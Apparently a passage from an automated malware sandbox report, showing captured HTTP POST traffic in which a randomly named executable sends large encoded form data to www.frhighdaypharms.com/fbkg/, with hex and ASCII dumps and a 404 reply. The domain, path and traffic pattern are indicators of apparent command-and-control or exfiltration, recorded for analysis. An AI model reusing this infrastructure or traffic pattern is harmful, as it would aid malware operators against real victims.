4a 35 4e 66 4b 34 43 7a 41 62 6b 4f 4c 66 6e 63 79 66 35 7a 63 34 75 58 6f 30 7a 4c 52 44 79 52 5a 51 50 52 33 2f 59 62 53 4f 52 35 4d 53 70 75 6b 2b 6e 6f 65 33 30 71 62 31 79 36 64 49 2f 61 6b 52 2b 52 45 67 2f 68 39 4a 74 41 67 4e 52 52 77 66 75 68 54 58 75 70 41 6b 31 36 4f 6b 6d 47 6f 46 32 2b 74 49 43 38 56 77 4f 7a 30 58 73 76 47 37 39 54 54 45 68 62 59 64 52 52 6f 75 35 5a 53 70 6b 6b 35 57 76 6b 39 51 76 6e 4d 4d 66 64 35 79 34 6a 35 5a 30 7a 38 4c 6f 79 2b 66 74 6e 32 41 2b 4e 66 5a 59 4f 41 30 56 70 43 47 49 76 33 75 41 4c 79 30 52 44 44 51 48 72 2b 4e 49 33 63 67 38 65 6c 4b 6c 39 41 67 30 43 48 53 2b 6b 46 75 30 58 4f 53 32 7a 49 32 43 50 6a 54 47 45 57 7a 43 2f 42 73 43 71 55 79 4e 46 6a 79 76 7a 49 72 77 4b 51 75 4b 35 2f 74 33 71 46 6d 6d 79 39 44 69 35 36 71 37 37 53 75 50 51 50 76 74 6e 4a 37 67 5a 6b 78 2f 58 31 2f 74 6e 50 39 41 4d 48 39 5a 4d 48 30 6a 5a 73 64 72 37 50 30 4d 78 37 55 41 66 49 2f 66 69 50 5a 52 6f 75 68 59 75 4b 42 6c 42 59 4f 74 48 41 72 53 37 78 57 52 57 30 6f 46 4c 49 71 52 44 68 51 56 50 78 6a 74 38 79 58 33 65 4e 6a 37 4e 6d 43 49 78 55
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333405972 CET1382OUTData Raw: 55 53 4b 36 64 75 73 71 34 6f 66 37 4e 56 48 48 59 6e 63 68 77 50 39 79 52 72 36 36 41 56 4c 43 6a 6a 4d 53 57 59 48 70 4d 39 38 4b 52 6b 6c 2b 76 34 76 72 34 37 4f 69 6b 4d 52 52 62 57 56 64 30 4e 36 43 7a 53 79 5a 6b 2b 6a 42 6a 47 48 50 47 68
                                                                                                                                                                                                Data Ascii: USK6dusq4of7NVHHYnchwP9yRr66AVLCjjMSWYHpM98KRkl+v4vr47OikMRRbWVd0N6CzSyZk+jBjGHPGhCyypPvPsMA/MD+j7E6r6WtbzrFqc9e7kT6I7ResDx5KVEaZmT4xnIorApJJaDdHQoSRIb9+Fe+7R6RgM9MFxuA+X1pGp1DFo4+ChGMDZEIpEJfj4MBpdbt4EIfxcpktcDvhpV3UwC4dedH1GJW9NpkQDXkOdgMO/h
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333538055 CET1389OUTData Raw: 71 52 48 4d 47 78 66 6c 77 73 76 75 65 46 66 53 37 76 31 59 33 6a 69 75 5a 59 38 63 5a 43 36 39 4e 6e 78 73 39 2b 57 2f 32 48 73 42 75 42 6f 4b 72 45 43 2b 69 57 31 30 36 55 30 7a 71 2f 37 35 79 75 5a 56 4b 66 59 65 65 5a 33 49 6e 6e 43 74 54 46
                                                                                                                                                                                                Data Ascii: qRHMGxflwsvueFfS7v1Y3jiuZY8cZC69Nnxs9+W/2HsBuBoKrEC+iW106U0zq/75yuZVKfYeeZ3InnCtTF1wTvsinLsEolbbU2nnJ6rkUQMNWCkmfIdbT2itTVoX+s8L+q9SqhokssAPat17zfo7/wuy1m1oCDdr8mJRKU822uWzRskOI+uXG999vQP1qVIq0jQG5/PaYqL+tCrQ9fNdFWR5jz6zKPEwnDJc5DhrXh8OrYPMsB+
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333611012 CET1390OUTData Raw: 4e 71 46 57 55 54 57 34 55 52 52 58 45 4c 39 68 71 33 70 6c 42 6e 56 35 41 75 70 4a 67 37 77 30 39 70 4c 72 52 52 51 50 37 75 7a 4f 48 2b 2b 57 63 73 41 75 79 38 70 53 49 44 77 52 6d 77 43 65 58 46 4c 6f 4d 2b 59 63 55 67 6e 54 6e 51 47 42 66 45
                                                                                                                                                                                                Data Ascii: NqFWUTW4URRXEL9hq3plBnV5AupJg7w09pLrRRQP7uzOH++WcsAuy8pSIDwRmwCeXFLoM+YcUgnTnQGBfEvVcac/1Yo4TySLCJDFrjjc2hP4z7lA/n/Jgx+Q3ue2nS/MLBYux2LFlfxrILSCCQo3MGkvV4ewdsf8bXAtXXfkmsuKwDzTCOdQ22Svt9AaDl+4mFCt9nVhaAYapWx8y4mtq7QLWNfJsB+m4HqgbS6JpN5MPPJJT+S
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333842993 CET1404OUTData Raw: 67 67 73 4c 5a 7a 31 2f 34 43 6d 73 33 78 57 5a 31 69 72 63 37 74 32 4f 50 53 6b 65 6f 59 62 43 46 57 74 43 73 54 4d 7a 4b 42 6a 4e 54 56 62 49 51 77 49 35 77 4a 2f 53 55 46 63 68 34 69 58 4f 49 63 63 36 4e 51 54 62 49 61 4b 6d 47 30 6e 72 44 47
                                                                                                                                                                                                Data Ascii: ggsLZz1/4Cms3xWZ1irc7t2OPSkeoYbCFWtCsTMzKBjNTVbIQwI5wJ/SUFch4iXOIcc6NQTbIaKmG0nrDG3lHcjptxGZFa3Wlv3TzTC7MBwW4ljhV2f6J92ZoRd/y7n7ebnEcmoWJUbSvky4iPL8gGsRP+Dir4HxEga5dm/U8CfMp7Jbvv+1xoYSH0VUFZvJoOt4q9tBC8zRkmNHfBeMka0qdiUjEMz4XPlfHGa/37ngwDZPibk
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503679037 CET1413OUTData Raw: 31 2f 75 50 75 51 49 68 7a 34 66 56 55 4f 49 34 56 35 38 56 30 7a 33 4c 44 54 67 55 77 38 6c 38 5a 32 76 45 68 6a 4d 41 37 64 6d 72 51 63 47 72 63 54 71 6d 75 31 66 59 72 4c 55 66 79 38 6c 58 48 47 47 52 4f 6e 4e 6d 68 4f 55 51 4b 32 65 30 42 7a
                                                                                                                                                                                                Data Ascii: 1/uPuQIhz4fVUOI4V58V0z3LDTgUw8l8Z2vEhjMA7dmrQcGrcTqmu1fYrLUfy8lXHGGROnNmhOUQK2e0BzUrBnsSyEZPDoj43Jdf26xwb6aE8+Q6V8z5EXR0cVe4CKQQoKRUl9F1m9kjB4ixxJfStrPYXCUsPy/1sHI402ZuoIMV4gnZ0puPoBJROv23o90Vjo3TWQkkSc1/FfkwXsXNnYOORIH1EREGoiPP+BQVcYziLtTcfbe
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503804922 CET1416OUTData Raw: 31 79 4d 72 4d 50 48 57 55 64 48 45 35 68 61 63 4c 43 34 35 45 58 46 69 68 4d 6b 34 6a 50 64 6e 76 39 52 48 32 35 33 38 63 7a 71 43 52 78 33 6b 69 6a 53 65 77 41 61 5a 2b 2f 36 38 49 31 37 6d 66 31 2b 41 6e 65 61 57 6c 6b 36 6d 31 78 70 46 76 47
                                                                                                                                                                                                Data Ascii: 1yMrMPHWUdHE5hacLC45EXFihMk4jPdnv9RH2538czqCRx3kijSewAaZ+/68I17mf1+AneaWlk6m1xpFvGBlxbaezmHFvyDXF+aYqnRaQ7uk3CyxsudnRghN0oW4ALlfGo1f6NceIm6hK7i1OSETpGNuNZUWm42NZj51DdnrP+ocGF9mMI/KLSSujxM0wsMOFckPqVXez+tduXiQECJt6LBVurwTetUTO1PfZUHY3PqTapX4YVE
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503860950 CET1419OUTData Raw: 6d 64 74 32 50 36 58 43 7a 6c 2f 2b 50 37 35 6b 6f 49 35 4f 37 59 39 48 46 50 62 79 46 6f 2f 71 5a 6a 70 39 67 75 6b 39 58 42 37 52 56 56 4b 48 4f 69 73 69 56 35 6c 62 6f 71 63 63 55 59 58 2f 4f 38 69 73 46 77 6f 65 4e 71 57 68 4a 54 6d 48 54 55
                                                                                                                                                                                                Data Ascii: mdt2P6XCzl/+P75koI5O7Y9HFPbyFo/qZjp9guk9XB7RVVKHOisiV5lboqccUYX/O8isFwoeNqWhJTmHTUkzPlP6eqrpAnTwM7o+Ri6BAH/BQb/USajvC5WpK4HxsuvMPKWgwOTNwj+fUrUJsGxXrsYqzfRHdmofmammD0v1pqosaBlm/W8oG+RhY9xZmgd1jxtSmxiUkgfFt7netHUhn8ixE1brSzoLOSbgkrBaj0KQBLb0TZw
                                                                                                                                                                                                Nov 17, 2023 19:32:10.675302029 CET1421INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:10 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                70209.182.252.24580192.168.11.2050197C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:10.161752939 CET1378OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.frhighdaypharms.com
                                                                                                                                                                                                Referer: http://www.frhighdaypharms.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 70 59 68 53 69 2b 6d 53 4a 31 49 7a 4d 72 6c 77 6b 69 66 75 31 4d 2b 38 44 66 36 4a 78 73 69 46 6a 6a 6f 6b 30 6a 6b 69 32 32 43 6f 4b 58 48 6f 5a 42 48 34 37 2b 4b 74 48 4f 77 4d 79 6c 39 55 55 69 41 6f 47 70 41 6d 77 61 79 55 59 70 4b 5a 31 7a 51 6f 32 49 68 49 45 41 74 43 49 79 36 33 39 38 45 36 37 36 58 66 6e 70 70 38 44 53 5a 42 44 33 46 58 6e 49 6c 37 38 47 75 55 7a 6a 4a 69 37 42 61 73 33 38 69 5a 50 45 4f 6a 72 41 37 33 44 49 72 4f 69 6c 59 6f 43 6c 39 61 5a 56 44 74 57 4a 39 67 2b 2b 47 42 4e 30 50 4a 32 46 79 78 51 7a 38 4a 63 58 36 55 59 58 6b 36 79 4e 6c 79 59 59 66 39 38 73 65 42 78 47 67 31 32 39 63 4e 6e 6f 79 45 7a 36 58 53 31 6e 58 57 67 66 68 49 6e 43 76 47 6d 4a 68 4d 68 6d 57 4f 48 48 47 38 64 56 6b 63 75 41 74 4c 51 32 6d 33 31 31 70 64 55 67 2f 2f 58 55 39 47 4f 77 6b 59 5a 4e 4d 46 77 61 6a 54 37 48 36 59 41 36 52 75 64 47 59 58 6b 77 48 77 45 77 78 59 4f 70 7a 41 31 7a 51 6c 6d 5a 49 33 54 57 78 36 75 7a 37 78 51 66 64 43 31 49 51 4b 33 66 48 30 6a 79 64 5a 78 76 33 46 69 78 59 2f 78 38 4c 4b 56 36 79 4b 7a 66 51 72 66 76 33 46 72 54 4a 75 2b 74 65 6c 73 50 54 5a 53 44 50 7a 35 41 2b 4e 61 79 35 70 6c 75 33 46 56 66 37 73 54 65 76 4f 74 6c 66 69 57 61 41 64 63 6d 73 38 2f 4c 2b 31 6d 32 7a 55 62 67 2b 34 46 4c 4e 41 56 75 69 78 75 6c 6e 32 48 4a 36 64 45 6c 4f 7a 70 51 2f 59 67 73 52 56 4b 79 2b 48 6d 52 62 31 4a 6f 45 6f 66 73 62 62 64 58 68 52 45 43 59 56 6f 46 42 50 31 48 4d 7a 72 70 59 42 2f 38 2f 33 75 48 4e 46 64 7a 57 52 58 31 30 66 62 4c 6c 33 45 34 72 65 34 43 7a 6f 4f 6d 79 4c 6f 54 4b 55 61 35 61 6e 50 32 2f 47 35 42 67 55 4a 32 73 61 34 71 55 7a 39 52 47 59 57 39 42 79 72 72 73 33 36 2b 6e 6e 46 41 46 76 64 64 54 6c 58 6a 56 46 30 57 4b 55 56 35 37 76 59 35 74 75 45 73 4f 65 77 59 37 46 67 68 32 46 53 38 57 54 52 63 47 2b 34 68 34 30 6c 58 48 42 41 38 4b 2f 47 77 72 75 57 72 31 6b 64 69 63 77 4e 43 39 33 38 7a 30 55 71 6f 76 4d 51 4b 30 79 50 36 4c 39 62 6d 66 72 65 79 6c 35 57 6b 69 6e 5a 48 6a 52 54 5a 6b 73 6c 75 51 48 43 6a 45 56 48 57 44 37 68 70 75 79 67 39 33 68 34 62 46 67 30 41 38 4b 78 7a 6d 55 33 4a 55 33 77 72 68 56 32 54 76 55 4a 4f 6f 37 66 65 55 64 30 54 2f 74 44 46 53 77 61 74 49 61 79 58 36 67 7a 52 70 72 41 71 45 5a 76 56 53 6d 45 52 71 34 54 66 6c 63 4c 57 7a 33 43 54 70 6b 73 62 47 53 56 59 43 66 2b 6a 61 6a 55 4d 41 5a 31 45 47 69 37 4c 47 4f 39 54 33 6e 33 4c 6b 70 64 48 6a 4a 41 36 30 31 2b 41 50 70 6d 39 42 44 67 5a 37 69 4c 44 6b 69 4e 53 47 36 30 39 4d 6f 73 6f 33 78 2f 6d 4e 58 31 41 6e 33 49 44 4a 4b 59 44 65 53 45 47 35 52 6e 4d 34 66 77 33 68 79 33 5a 43 6b 2b 31 4e 43 6d 65 39 52 6d 73 69 45 45 38 37 59 42 33 2f 47 38 31 32 41 7a 49 53 72 4e 4f 46 58 4b 41 50 6b 69 4e 44 34 51 34 44 4c 48 54 30 6b 6a 55 37 48 6c 63 63 42 31 36 32 30 32 39 64 4a 37 6d 36 48 54 64 78 72 49 4b 79 47 48 6a 7a 39 64 6c 6a 75 57 4f 6c 7a 34 2b 33 75 71 38 75 78 42 6e 46 50 31 4c 2b 76 76 4f 36 39 32 30 4c 69 79 61 34 37 55 57 70 37 42 4f 6c 63 49 4f 56 44 44 54 41 41 33 74 39 7a 76 38 4a 35 4e 66 4b 34 43 7a 41 62 6b 4f 4c 66 6e 63 79 66 35 7a 63 34 75 58 6f 30 7a 4c 52 44 79 52 5a 51 50 52 33 2f 59 62 53 4f 52 35 4d 53 70 75 6b 2b 6e 6f 65 33 30 71 62 31 79 36 64 49 2f 61 6b 52 2b 52 45 67 2f 68 39 4a 74 41 67 4e 52 52 77 66 75 68 54 58 75 70 41 6b 31 36 4f 6b 6d 47 6f 46 32 2b 74 49 43 38 56 77 4f 7a 30 58 73 76 47 37 39 54 54 45 68 62 59 64 52 52 6f 75 35 5a 53 70 6b 6b 35 57 76 6b 39 51 76 6e 4d 4d 66 64 35 79 34 6a 35 5a 30 7a 38 4c 6f 79 2b 66 74 6e 32 41 2b 4e 66 5a 59 4f 41 30 56 70 43 47 49 76 33 75 41 4c 79 30 52 44 44 51 48 72 2b 4e 49 33 63 67 38 65 6c 4b 6c 39 41 67 30 43 48 53 2b 6b 46 75 30 58 4f 53 32 7a 49 32 43 50 6a 54 47 45 57 7a 43 2f 42 73 43 71 55 79 4e 46 6a 79 76 7a 49 72 77 4b 51 75 4b 35 2f 74 33 71 46 6d 6d 79 39 44 69 35 36 71 37 37 53 75 50 51 50 76 74 6e 4a 37 67 5a 6b 78 2f 58 31 2f 74 6e 50 39 41 4d 48 39 5a 4d 48 30 6a 5a 73 64 72 37 50 30 4d 78 37 55 41 66 49 2f 66 69 50 5a 52 6f 75 68 59 75 4b 42 6c 42 59 4f 74 48 41 72 53 37 78 57 52 57 30 6f 46 4c 49 71 52 44 68 51 56 50 78 6a 74 38 79 58 33 65 4e 6a 37 4e 6d 43 49 78 55
                                                                                                                                                                                                Data Ascii: T6I=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